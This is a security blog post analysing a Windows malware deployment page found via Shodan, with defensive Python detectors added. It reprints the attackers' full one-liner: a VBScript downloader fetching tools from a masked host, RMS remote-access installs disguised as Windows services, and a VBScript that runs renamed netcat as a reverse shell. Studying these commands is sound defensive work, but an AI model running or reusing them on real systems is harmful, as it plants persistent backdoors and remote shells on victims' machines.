Investigating malicious code

By Roger, Wed 02 May 2018, in category Security

botnet, security


During a search on Shodan, I stumbled on a couple of servers hosting a very strange site. I searched for port:8081 index32 and found this. The page looks like a server from which a botnet will be installed, a kind of deployment server.

:::xml
HTTP/1.1 200 Ok
Content-Length: 3673
Last-modified: Sat, 14 Oct 2017 14:15:34 GMT
Content-Type: text/html
Connection: Keep-Alive
Server: SHS

<a href="index32.html">x32</a>
<br />
<a href="index64.html">x64</a>
<br /><br />

md "C:\WINDOWS\SysWOW64\wbem\" &
del C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
del C:\WINDOWS\SysWOW64\wbem\wget.exe &
del C:\WINDOWS\SysWOW64\wbem\7za.exe &
ping -n 2 127.0.0.1 &
echo Set x = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo call x.Open("GET", "http://XX.XX.XX.XX:8081/32/wget.exe", 0) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo x.Send() >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo Set s = CreateObject("ADODB.Stream") >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Mode = 3 >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Type = 1 >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Open() >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo s.Write(x.responseBody) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
echo call s.SaveToFile("C:\WINDOWS\SysWOW64\wbem\wget.exe", 2) >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
cscript C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
ping -n 2 127.0.0.1 &
del C:\WINDOWS\SysWOW64\wbem\wgett.vbs &
ping -n 2 127.0.0.1 &
C:\WINDOWS\SysWOW64\wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\Wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/7za.exe &
ping -n 2 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\Wbem\mzbl 7za.exe &
ping -n 1 127.0.0.1 &
copy /y c:\WINDOWS\SysWOW64\wbem\wget.exe c:\windows\system32\wbem\ &
copy /y c:\WINDOWS\SysWOW64\Wbem\7za.exe c:\windows\system32\wbem\ &
C:\WINDOWS\SysWOW64\wbem\7za &
echo. &
echo. &
set PROCESSOR_ARCH &
echo.

<br /><br /><br /><br />

C:\WINDOWS\SysWOW64\Wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/Rms.zip &
ping -n 2 127.0.0.1 &
C:\WINDOWS\SysWOW64\Wbem\7za x -r -p1 "C:\WINDOWS\SysWOW64\wbem\Rms.zip" -o"C:\WINDOWS\SysWOW64\wbem" -aoa &
ping -n 2 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\wbem\Rms Rm &
ping -n 2 127.0.0.1 &
regedit.exe /s c:\Windows\SysWOW64\wbem\Rm\01.reg &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /silentinstall &
ping -n 2 127.0.0.1 &
REG ADD HKLM\SYSTEM\CurrentControlSet\services\RManService /v DisplayName /d "Windows Access" /f &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /firewall &
del C:\WINDOWS\SysWOW64\wbem\Rms.zip &
C:\WINDOWS\SysWOW64\wbem\Rm\rutserv.exe /start &
ping -n 4 127.0.0.1 &
net start RManService

<br /><br />

sc config "RManService" start= demand

<br /><br /><br /><br />

C:\WINDOWS\SysWOW64\Wbem\wget -c -t 5 -P C:\WINDOWS\SysWOW64\Wbem --no-check-certificate http://XX.XX.XX.XX:8081/32/Ncd1.zip &
ping -n 3 127.0.0.1 &
C:\WINDOWS\SysWOW64\Wbem\7za x -r -p1 "C:\WINDOWS\SysWOW64\Wbem\Ncd1.zip" -o"C:\WINDOWS\SysWOW64\wbem\" -aoa &
xcopy C:\WINDOWS\system32\cmd.exe c:\WINDOWS\SysWOW64\wbem\Ncd1\02\ &
ping -n 3 127.0.0.1 &
ren C:\WINDOWS\SysWOW64\wbem\Ncd1\02\cmd.exe svchost.exe &
ping -n 3 127.0.0.1 &
del c:\Windows\SysWOW64\wbem\Ncd1.zip &
c:\Windows\SysWOW64\wbem\Ncd1\01\instsrv.exe "Windows Ncd" c:\Windows\SysWOW64\wbem\Ncd1\01\svchost.exe &
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Ncd\Parameters" /v Application /d "cscript c:\Windows\SysWOW64\wbem\Ncd1\01.vbs" /f &
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Windows Ncd" /v Description /d "Query service DHCP addresses, and provides performance library information from Windows Management Instrumentation providers to clients on the network. This service only runs when Performance Data Helper is activated." /f &
net start "Windows Ncd"

First, have a look at the servers. It looks like the owners of the systems don't know anything about the service they are delivering. We could teach them a lesson in cybersecurity, because a lot of unnecessary services are still open to the wild. The web service always runs on "Small Home Server httpd" on port 8081, and the servers are located in Russia (4), Ukraine (2), the Netherlands (1) and Belarus (1).

Next, what exactly are they doing? It looks like a one-liner that installs the malware. These are the steps we identified in the listing above.

Preparing the system: the first block creates the wbem directory, writes a small VBScript downloader (WinHttpRequest plus ADODB.Stream) to fetch wget.exe, and then uses wget to fetch 7za.exe.

The remote control application: the second block fetches Rms.zip, extracts it with 7za, imports 01.reg, installs rutserv.exe as a service, gives that service the display name "Windows Access" and starts it.

The same for Ncd1.zip, the backdoor application: the third block fetches and extracts Ncd1.zip, copies cmd.exe in as svchost.exe, installs the service "Windows Ncd" with instsrv.exe and points its Application parameter at 01.vbs.

Also notice the way they implement a sleep: ping -n 3 127.0.0.1, a ping to localhost.
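As an added example (not code from the post), here is a small Python detector that turns the indicators in this one-liner into rules and runs them over constructed process command lines of the kind a Sysmon process-creation event would supply: the loopback ping used as a sleep, the WinHttp/ADODB download cradle, a script interpreter run from the wbem directory, a service DisplayName rewritten with reg add, a file renamed to svchost.exe, and any file under \wbem\ that is not a known WMI tool. The wbem allowlist is an assumed, partial set.

```python
import re

# Sample process command lines, constructed for this example in the style of the
# deployment one-liner above (a Sysmon process-creation event's CommandLine field
# is a typical source). The last two are benign and must not fire.
SAMPLE_CMDLINES = [
    r'ping -n 2 127.0.0.1',
    r'echo Set x = CreateObject("WinHttp.WinHttpRequest.5.1") >>C:\WINDOWS\SysWOW64\wbem\wgett.vbs',
    r'cscript C:\WINDOWS\SysWOW64\wbem\wgett.vbs',
    r'C:\WINDOWS\SysWOW64\wbem\7za x -r -p1 "C:\WINDOWS\SysWOW64\wbem\Rms.zip" -aoa',
    r'REG ADD HKLM\SYSTEM\CurrentControlSet\services\RManService /v DisplayName /d "Windows Access" /f',
    r'ren C:\WINDOWS\SysWOW64\wbem\Ncd1\02\cmd.exe svchost.exe',
    r'ping -n 4 192.0.2.10',
    r'C:\Windows\System32\wbem\WMIC.exe os get caption',
]

RULES = {
    "loopback ping used as sleep": re.compile(r"\bping\s+-n\s+\d+\s+127\.0\.0\.1\b", re.I),
    "WinHttp/ADODB download cradle": re.compile(r"WinHttp\.WinHttpRequest|ADODB\.Stream", re.I),
    "script interpreter run from wbem": re.compile(r"\b[cw]script\b.*\\wbem\\", re.I),
    "service DisplayName rewritten via reg add": re.compile(r"\breg\s+add\b.*\\services\\.*\s/v\s+DisplayName\b", re.I),
    "file renamed or copied to svchost.exe": re.compile(r"\b(ren|rename|copy|xcopy)\b.*\bsvchost\.exe\b", re.I),
}

# Executables that belong in System32\wbem: an assumed, partial allowlist for this
# example; build the real one from a known-good host of the same Windows build.
WBEM_ALLOWLIST = {"wmic.exe", "wmiprvse.exe", "winmgmt.exe", "mofcomp.exe", "wbemtest.exe",
                  "scrcons.exe", "unsecapp.exe", "wmiadap.exe", "wmiapsrv.exe"}
# First path component directly under \wbem\ when it is a file name, not a subdirectory.
WBEM_FILE = re.compile(r'\\wbem\\([\w-]+(?:\.exe)?)(?=[\s"]|$)', re.I)

def scan_cmdline(cmdline):
    """Return the names of every indicator that fires on one command line."""
    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    for m in WBEM_FILE.finditer(cmdline):
        if m.group(1).lower() not in WBEM_ALLOWLIST:
            hits.append(f"unexpected file under wbem: {m.group(1)}")
    return hits

def scan_all(cmdlines):
    """Map each command line to its hits, keeping only the lines that fired."""
    results = {c: scan_cmdline(c) for c in cmdlines}
    return {c: h for c, h in results.items() if h}

if __name__ == "__main__":
    for cmd, hits in scan_all(SAMPLE_CMDLINES).items():
        print(cmd[:60], "->", ", ".join(hits))
```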

What is rutserv.exe?

Rms is a remote-access tool from Remote Utilities. It is like TeamViewer, but with more options and functions. Although it is a legitimate program, it can be used for malicious activities.

Registry

Looking in the 01.reg file, we can see some remarkable things. To obfuscate the data inserted into the registry, they wrote it as hex. The first part changes some settings and inserts a licence key. Yes, even malware uses licence keys.

:::console
TPF0TROMServerOptions  UseNTAuth
SecurityLevelPortEnableOverlayCaptureShowTrayIconBindIP Any
interfaceLanguageRussianCallbackAutoConnect CallbackConnectInterval
<HideStopIpFilterTypeProtectCallbackSettingsProtectInetIdSettingsDoNotCaptureRDPUseIPv6
InternetIdX-XXXXXXXX-XXXX-XXXXUseInetConnection  UseCustomInetServer
InetIdPort
UseInetIdIPv6DisableRemoteControlDisableRemoteScreenDisableFileTransferDisableRedirect
DisableTelnetDisableRemoteExecuteDisableTaskManagerDisableOverlayDisableShutdownDisableRemoteUpgradeDisablePreviewCaptureDisableDeviceManagerDisableChatDisableScreenRecordDisableAVCaptureDisableSendMessageDisableRegistry
DisableAVChatDisableRemoteSettingsNotifyChangeTrayIconNotifyBallonHintNotifyPlaySoundLogUseSidId42141.5638087153Licenses®RMS-F-<HASH>
ProxySettings&<?xml version="1.0" encoding="UTF-16"?>
<proxy_settings version="51200">
  <use_proxy>false</use_proxy>
  <proxy_type>0</proxy_type>
  <host></host>
  <port>8080</port>
  <need_auth>false</need_auth>
  <ntml_auth>false</ntml_auth>
  <username></username><password>
  </password><domain></domain>
</proxy_settings>

The second part contains the screen-recording settings. They turned recording off.

:::xml
<sreen_record_option version="51200">
  <main_options>
    <active>false</active>
    <interval_shot>60</interval_shot>
    <protect_record>false</protect_record>
    <compression_quality>90</compression_quality>
    <scale_quality>100</scale_quality>
    <compression_type>0</compression_type>
    <max_file_size>100</max_file_size>
    <auto_clear>false</auto_clear>
    <auto_clear_days>0</auto_clear_days>
    <used_file_limit>true</used_file_limit>
    <all_files_limit_mb>1000</all_files_limit_mb>
    <draw_datatime_on_image>true</draw_datatime_on_image>
  </main_options>
  <schedules/>
</sreen_record_option>

Then they put a password in the registry, stored as hex and completely unreadable.

:::console
"Pwd"=hex:25,d5,5a,d2,83,aa,40,0a,f4,64,c7,6d,71,3c,07,ad

The last part sets how and where to connect. Notice the internal IP as well.

:::console
ÿþ[{CCFE6CBD-9608-4107-A67E-9237320510CC}]
internal_connection_id={3F5822DE-5ACD-41CA-8FC2-413E823AD2E8}
host=XXX.XXX.XXX
port=5651
text_message=
auto_connect=1
status=2
display_name=XXX.XXX.XXX
disallow_tray_connect=0
append_computer_name=0

[{CE4311AA-A579-4558-8BB7-0AB69FF213FB}]
internal_connection_id={B26A491B-C580-45BB-92CB-FC33BEFC1EAA}
host=XXX.XXX.XXX
port=5652
text_message=
auto_connect=1
status=2
display_name=XXX.XXX.XXX
disallow_tray_connect=0
append_computer_name=0

[{2690D108-4D7A-40A3-AE1F-F9787371D16C}]
internal_connection_id={621838EB-E801-41B9-9021-74E7AFCF18D0}
host=10.XX.XX.1
port=5651
text_message=
auto_connect=1
status=2
display_name=10.XX.XX.1
disallow_tray_connect=0
append_computer_name=0

[{06B28623-C9D6-4029-8A88-1E5F0C03DFAF}]
internal_connection_id=--
host=10.XX.XX.1
port=5652
text_message=
auto_connect=1
status=2
display_name=10.XX.XX.1
disallow_tray_connect=0
append_computer_name=0
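The connection profile reaches the registry as a hex value, so extracting the targets means decoding it first. As an added example (not code from the post), this Python renders a constructed profile the way regedit exports it, a UTF-16 LE blob whose ff fe byte-order mark is what appears as ÿþ at the top of the block above, then parses the hex values back and pulls host, port and auto_connect out of every INI-style section, skipping non-text values such as the Pwd bytes quoted earlier. The GUIDs, hosts and registry path are placeholders.

```python
import re
import configparser
# Profile constructed for this example in the layout of the decoded block above;
# GUIDs and hosts are placeholders, not values from the real 01.reg.
PROFILE_TEXT = (
    "[{11111111-2222-3333-4444-555555555555}]\r\ninternal_connection_id={66666666-7777-8888-9999-000000000000}\r\n"
    "host=203.0.113.5\r\nport=5651\r\ntext_message=\r\nauto_connect=1\r\nstatus=2\r\ndisplay_name=203.0.113.5\r\n\r\n"
    "[{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}]\r\ninternal_connection_id=--\r\nhost=10.0.0.1\r\nport=5652\r\nauto_connect=0\r\n"
)

def to_reg_hex(name, data, width=25):
    """Render bytes as a .reg 'hex:' value with backslash line continuations."""
    parts = [f"{b:02x}" for b in data]
    rows = [",".join(parts[i:i + width]) for i in range(0, len(parts), width)]
    return f'"{name}"=hex:' + ",\\\r\n  ".join(rows)

# The export as regedit /s consumes it: a UTF-16 LE blob with BOM ff fe, plus the opaque Pwd value from the post.
REG_SAMPLE = ("Windows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example]\r\n"
              + to_reg_hex("Connections", b"\xff\xfe" + PROFILE_TEXT.encode("utf-16-le")) + "\r\n"
              + '"Pwd"=hex:25,d5,5a,d2,83,aa,40,0a,f4,64,c7,6d,71,3c,07,ad\r\n')

def reg_hex_values(reg_text):
    """Yield (name, bytes) for every hex: value, joining backslash continuation lines."""
    lines, i = reg_text.splitlines(), 0
    while i < len(lines):
        m = re.match(r'^"([^"]+)"=hex(?:\([0-9a-fA-F]+\))?:(.*)$', lines[i])
        i += 1
        if m:
            name, body = m.group(1), m.group(2)
            while body.rstrip().endswith("\\") and i < len(lines):
                body = body.rstrip()[:-1] + lines[i].strip()
                i += 1
            yield name, bytes.fromhex("".join(h.strip() for h in body.split(",") if h.strip()))

def decode_text(blob):
    """Decode a REG_BINARY text blob, honouring the UTF-16 LE BOM that regedit writes."""
    if blob[:2] == b"\xff\xfe":
        return blob[2:].decode("utf-16-le")
    return blob.decode("utf-8", errors="replace")

def connection_targets(reg_text):
    """Return (host, port, auto_connect) for each INI-style profile hidden in a hex value."""
    targets = []
    for _name, blob in reg_hex_values(reg_text):
        text = decode_text(blob)
        if "[{" not in text:              # opaque binary such as Pwd, not a profile
            continue
        cp = configparser.ConfigParser(interpolation=None, strict=False)
        cp.read_string(text)
        targets += [(cp[s]["host"], int(cp[s]["port"]), cp[s]["auto_connect"] == "1") for s in cp.sections()]
    return targets
```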

First 01.vbs script

When the service "Windows Ncd" starts, a VBScript is run. This is what it does:

:::vbscript
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "c:\Windows\System32\wbem\Ncd1\7za.exe x -r -p1 ""c:\Windows\System32\wbem\Ncd1\Ncd.zip"" -o""C:\WINDOWS\system32\wbem\"" -aoa", 0
WScript.Sleep 5000
oShell.run "c:\Windows\System32\wbem\Ncd1\svchost.exe c:\Windows\System32\wbem\Ncd\01.vbs", 0
Set oShell = Nothing

It unzips a different zip file, Ncd.zip, and runs the new 01.vbs file. Changing or deleting the extracted files won't help: every time the service starts, it unzips the archive again.

Second 01.vbs script

So we now have a second 01.vbs. How confusing can it be... This script contains:

:::vbscript
do
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "c:\Windows\System32\wbem\Ncd\svchost.exe -d -vv XXX.XXX.XXX 8082 -e cmd.exe", 0
WScript.Sleep 30000
oShell.run "net stop ""Windows Ncd""", 0
Set oShell = Nothing
WScript.Sleep 10000
loop

This script uses the just-extracted svchost.exe, which is actually just netcat renamed. It connects to the host XXX.XXX.XXX on port 8082 and runs a reverse shell over it. So besides all the fancy stuff, it's just a reverse shell they try to start here.
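The loop above gives the backdoor a very regular rhythm: a fresh netcat connection to port 8082 about every 40 seconds (30 s plus 10 s of sleep) from an svchost.exe that does not live in System32 or SysWOW64. As an added example (not from the post), this Python checks both signals against constructed connection events in the shape of Sysmon event 3; hosts and timestamps are placeholders.

```python
from collections import defaultdict
from datetime import datetime

# Constructed outbound-connection events in the shape of Sysmon event 3 (not real
# telemetry): the renamed netcat dials out every ~40 s (30 s + 10 s of sleep in the
# loop above), while a genuine svchost.exe talks to an update host twice.
NC_IMAGE = r"C:\Windows\SysWOW64\wbem\Ncd\svchost.exe"
REAL_IMAGE = r"C:\Windows\System32\svchost.exe"
SAMPLE_EVENTS = [
    {"time": "2018-04-30 14:00:00", "image": NC_IMAGE, "dst": "203.0.113.9", "port": 8082},
    {"time": "2018-04-30 14:00:05", "image": REAL_IMAGE, "dst": "203.0.113.20", "port": 443},
    {"time": "2018-04-30 14:00:40", "image": NC_IMAGE, "dst": "203.0.113.9", "port": 8082},
    {"time": "2018-04-30 14:01:20", "image": NC_IMAGE, "dst": "203.0.113.9", "port": 8082},
    {"time": "2018-04-30 14:02:01", "image": NC_IMAGE, "dst": "203.0.113.9", "port": 8082},
    {"time": "2018-04-30 14:03:05", "image": REAL_IMAGE, "dst": "203.0.113.20", "port": 443},
]

SVCHOST_HOMES = {r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe"}

def svchost_misplaced(image):
    """True for a process named svchost.exe that does not live in System32 or SysWOW64."""
    path = image.lower()
    return path.endswith("\\svchost.exe") and path not in SVCHOST_HOMES

def beacons(events, min_count=3, jitter=5.0):
    """Return {(image, dst, port): mean period in s} for flows seen min_count+ times at a steady gap."""
    by_flow = defaultdict(list)
    for e in events:
        by_flow[(e["image"], e["dst"], e["port"])].append(
            datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S"))
    found = {}
    for flow, times in by_flow.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # jitter is the allowed spread between shortest and longest gap (scheduling delays)
        if len(times) >= min_count and max(gaps) - min(gaps) <= jitter:
            found[flow] = round(sum(gaps) / len(gaps), 1)
    return found

def triage(events):
    """Per image, the reasons it looks like this backdoor; images with none are omitted."""
    reasons = defaultdict(list)
    for image in sorted({e["image"] for e in events}):
        if svchost_misplaced(image):
            reasons[image].append("svchost.exe outside System32/SysWOW64")
    for (image, dst, port), period in beacons(events).items():
        reasons[image].append(f"connects to {dst}:{port} every {period} s")
    return dict(reasons)
```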

C&C host

So far we have identified one Command and Control host. It uses port 8082 for reverse shells and ports 5651 and 5652 for remote control. Looking at shodan.io, we found some more ports. One is port 8089, which shodan.io identified as an unpatched D-Link router. As of 2018-04-30 14:17:25, nothing is responding anymore, so it has probably been taken offline.

Conclusion

This malware puts a computer under remote control through the Rms software. It starts a reverse shell and makes it persistent. The way it does this job is very simple, and could prove very effective. It also shows how easily some malware can be found. So please keep your computers patched and check for strange services running or connections to unknown remote ports. Also check your external IPs on public services. Maybe those services are not yours at all...